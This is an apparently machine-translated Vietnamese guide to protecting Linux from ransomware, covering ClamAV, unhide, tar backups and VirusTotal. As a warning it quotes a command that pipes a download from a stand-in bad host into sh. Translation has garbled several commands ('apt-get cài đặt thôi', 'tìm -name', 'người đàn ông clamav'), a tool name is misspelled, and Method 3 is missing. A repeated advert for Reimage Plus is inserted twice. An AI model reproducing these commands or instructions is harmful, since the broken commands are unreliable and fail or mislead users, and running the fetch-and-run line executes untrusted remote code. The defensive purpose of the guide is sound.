Làm thế nào để bảo vệ Linux từ Ransomwares
Ransomware là một trong những vấn đề đe dọa hơn trong thế giới an ninh mạng hiện nay. Thật đáng sợ khi nghĩ rằng ai đó có thể giữ con tin dữ liệu của bạn. Một số nhiễm trùng ransomware mã hóa tất cả dữ liệu trên một khối lượng cụ thể, và các cá nhân đằng sau nó yêu cầu một số tiền nhất định trước khi họ đồng ý tiết lộ khóa cần thiết để mở khóa dữ liệu đã nói. Nó đặc biệt liên quan đến những người có rất nhiều tiền đầu tư vào dữ liệu của họ. Tuy nhiên, có một chút tin tốt cho người dùng Linux.
Trong hầu hết các trường hợp, khó khăn cho mã ransomware để kiểm soát bất kỳ thứ gì ngoài thư mục chính của người dùng. Các chương trình này không có quyền truy cập vào thùng rác toàn bộ quá trình cài đặt. Đây là lý do tại sao Linux ransomware là một vấn đề trên các máy chủ, nơi các nhà khai thác luôn có quyền truy cập root. Ransomware không phải là vấn đề lớn đối với người dùng Linux và có một số bước cần thực hiện để ngăn chặn nó xảy ra với bạn.
Phương pháp 1: Bảo vệ chống tấn công kiểu BashCrypt
BasyCrypt là một bằng chứng về khái niệm ransomware đã chứng tỏ nó có thể lây nhiễm các cấu trúc máy chủ với loại mã độc này. Điều này cung cấp một đường cơ sở cho những gói phần mềm ransomware Linux có thể trông như thế nào. Mặc dù chúng không phổ biến, nhưng các biện pháp ngăn ngừa cảm giác thông thường cho các quản trị viên máy chủ của các nền tảng khác cũng hoạt động tốt ở đây. Vấn đề là trong môi trường cấp doanh nghiệp có thể có một số lượng lớn người khác nhau sử dụng hệ thống máy chủ.
Nếu bạn đang chạy một máy chủ thư, nó có thể là hết sức khó khăn để giữ cho mọi người làm những điều ngu xuẩn. Cố gắng hết sức để nhắc mọi người đừng mở các tệp đính kèm mà họ không chắc chắn và luôn quét phần mềm độc hại mọi thứ được đề cập đến. Một điều khác có thể thực sự giúp ngăn chặn các loại tấn công này đến từ việc xem cách bạn cài đặt các tệp nhị phân với wget. Đương nhiên, máy chủ thư của bạn có thể thiếu hoàn toàn môi trường máy tính để bàn và bạn có thể sử dụng wget, apt-get, yum hoặc pacman để quản lý các gói đến. Điều quan trọng là phải xem những kho lưu trữ nào được sử dụng trong các cài đặt này. Đôi khi bạn sẽ thấy một lệnh muốn bạn thực thi một cái gì đó như wget http: //www.thisisaprettybadcoderepo.webs/ -O- | sh, hoặc nó có thể nằm bên trong một kịch bản lệnh shell. Trong cả hai cách, không chạy nó nếu bạn không biết kho lưu trữ đó là gì.
Phương pháp 2: Cài đặt Gói Máy quét
Một số công nghệ quét phần mềm độc hại mã nguồn mở tồn tại. ClamAV là nổi tiếng nhất, và bạn có thể cài đặt nó trên nhiều bản phân phối dựa trên apt bằng cách sử dụng:
sudo apt-get cài đặt clamav
Khi nó được cài đặt, người đàn ông clamav nên giải thích cách sử dụng bằng ngôn ngữ đơn giản. Hãy nhớ rằng trong khi nó có thể quét và xóa các tập tin bị nhiễm, nó không thể thực sự loại bỏ mã lây nhiễm từ một tập tin. Đây là một tình huống tất cả hoặc không có gì.
Có một máy quét thứ hai bạn có thể không quen thuộc, nhưng nó hữu ích nếu các quá trình ẩn là những gì làm bạn sợ. Một lần nữa nếu bạn đang sử dụng một bản phân phối dựa trên apt, sau đó đưa ra lệnh này để cài đặt trình quét ẩn:
sudo apt-get cài đặt thôi
Mẹo CHUYÊN NGHIỆP: Nếu vấn đề xảy ra với máy tính của bạn hoặc máy tính xách tay / máy tính xách tay, bạn nên thử sử dụng phần mềm Reimage Plus có thể quét các kho lưu trữ và thay thế các tệp bị hỏng và bị thiếu. Điều này làm việc trong hầu hết các trường hợp, nơi vấn đề được bắt nguồn do một tham nhũng hệ thống. Bạn có thể tải xuống Reimage Plus bằng cách nhấp vào đây
Khi được cài đặt, hãy nhập:
sudo unhide sys
Điều này sẽ thực hiện quét toàn bộ hệ thống của bạn cho bất kỳ quy trình ẩn nào.
Phương pháp 4: Giữ sao lưu sạch trên tay
Trong khi điều này thậm chí không nên là một vấn đề vì tất cả mọi người nên luôn luôn thực hiện sao lưu, có sao lưu tốt ngay lập tức có thể zap ransomware ra. Những gì rất ít ransomware có trên nền tảng Linux có xu hướng tấn công các tập tin với phần mở rộng được cụ thể cho các nền tảng phát triển Web. Điều này có nghĩa là nếu bạn có hàng tấn mã .php, .xml hoặc .js, bạn sẽ đặc biệt muốn sao lưu lại. Hãy xem xét dòng mã sau đây:
tar -cf backups.tar $ (tìm -name * .ruby -or -name * .html)
Điều này sẽ tạo một tệp lưu trữ băng lớn của mọi tệp có đuôi .ruby và .html trong cấu trúc tệp. Sau đó nó có thể được di chuyển đến một thư mục con tạm thời khác để trích xuất để đảm bảo rằng nó tạo ra nó hoạt động đúng.
Lưu trữ băng này có thể và nên được chuyển sang một ổ đĩa ngoài. Tất nhiên bạn có thể sử dụng nén .bz2, .gz hoặc .xv trước khi làm như vậy. Bạn có thể muốn tạo bản sao lưu được nhân đôi bằng cách sao chép nó qua hai khối khác nhau.
Phương pháp 5: Sử dụng máy quét dựa trên web
Có lẽ bạn đã tải xuống gói RPM hoặc DEB từ trang web hứa hẹn chứa phần mềm hữu ích. Phần mềm cũng được phân phối thông qua tập tin tar 7z hoặc nén. Người dùng thiết bị di động cũng có thể nhận gói Android ở định dạng APK. Thật dễ dàng để quét chúng bằng công cụ ngay trong trình duyệt của bạn. Trỏ đến https://www.virustotal.com/ và sau khi tải trang nhấn nút Chọn tệp. Trước khi bạn tải lên, hãy nhớ rằng đây là một máy chủ công cộng. Trong khi nó được an toàn và được điều hành bởi Alphabet Inc, nó chuyển các tệp công khai, có thể là một vấn đề trong một số môi trường siêu an toàn. Nó cũng bị giới hạn đến 128 MB tệp.
Chọn tệp của bạn trong hộp xuất hiện và chọn mở. Tên tệp sẽ xuất hiện trong dòng bên cạnh nút sau khi hộp biến mất.
Click vào màu xanh lớn Quét nó! nút. Bạn sẽ thấy một hộp khác cho biết hệ thống đang tải lên tệp của bạn.
Nếu ai đó đã kiểm tra trước tệp, thì nó sẽ thông báo cho bạn về báo cáo trước đó. Nó nhận ra điều này dựa trên tổng SHA256, hoạt động giống như các công cụ dòng lệnh Linux mà bạn đã từng sử dụng. Nếu không, sau đó nó sẽ chạy toàn bộ quét với 53 chương trình quét khác nhau. Một vài trong số đó có thể hết thời gian khi tệp được chạy và các kết quả này có thể được bỏ qua một cách an toàn.
Một số chương trình có thể trả về các kết quả khác so với các chương trình khác, vì vậy thật dễ dàng để loại bỏ các kết quả dương tính giả với hệ thống này. Phần tốt nhất là nó hoạt động giữa các nền tảng khác nhau, làm cho nó hấp dẫn không kém bất kể phân phối bạn có trên các thiết bị khác nhau. Nó cũng hoạt động tốt như các bản phân phối di động như Android, một lần nữa đó là lý do tại sao đó là cách tuyệt vời để kiểm tra các gói APK trước khi sử dụng chúng.
Mẹo CHUYÊN NGHIỆP: Nếu vấn đề xảy ra với máy tính của bạn hoặc máy tính xách tay / máy tính xách tay, bạn nên thử sử dụng phần mềm Reimage Plus có thể quét các kho lưu trữ và thay thế các tệp bị hỏng và bị thiếu. Điều này làm việc trong hầu hết các trường hợp, nơi vấn đề được bắt nguồn do một tham nhũng hệ thống. Bạn có thể tải xuống Reimage Plus bằng cách nhấp vào đây